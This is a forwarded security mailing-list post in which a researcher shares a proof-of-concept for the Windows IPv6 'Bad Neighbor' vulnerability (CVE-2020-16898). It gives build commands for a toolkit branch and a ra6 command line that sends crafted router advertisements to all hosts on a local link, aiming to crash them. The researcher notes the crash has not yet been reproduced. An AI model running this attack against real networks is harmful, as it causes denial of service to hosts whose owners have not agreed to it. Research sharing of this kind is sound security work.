[Lista ArNOG] Fwd: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)

Fernando Gont fgont en si6networks.com
Mie Oct 14 13:47:56 -03 2020


FYI


-------- Forwarded Message --------
Subject: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Date: Wed, 14 Oct 2020 13:24:22 -0300
From: Fernando Gont <fgont en si6networks.com>
To: IPv6 Hackers Mailing List <ipv6hackers en lists.si6networks.com>

Folks,

You may be aware about CVE-2020-16898. If not, now you are :-) : 
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/

I've produced PoC for the aforementioned vulnerability according to the 
description on the McAfee site, but somehow I seem to fail to trigger 
the "Blue Screen Of Death" when trying the attack against my local MS 
Windows 10 installation.

FWIW, the packet I'm sending can be downloaded (pcap) here: 
https://www.gont.com.ar/pcaps/bad-neighbor.pcap

The packet can be crafted with the ra6 tool of the SI6 toolkit present 
in the "nd-opt-fuzzing" branch of the github repo 
(https://github.com/fgont/ipv6toolkit). That is,

git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install


And then run the ra6 tool as:

sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e


Note that this will target all nodes on the local-link for the INTERFACE 
interface. You may set the "-d" option to a unicast address if you want 
to target a single system.

I'll keep looking further into this issue and report back to the group 
if I find anything.

If you do play with the tool and test the PoC, please do let me/us know.

Thanks!

Regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fgont en si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492






Más información sobre la lista de distribución Lista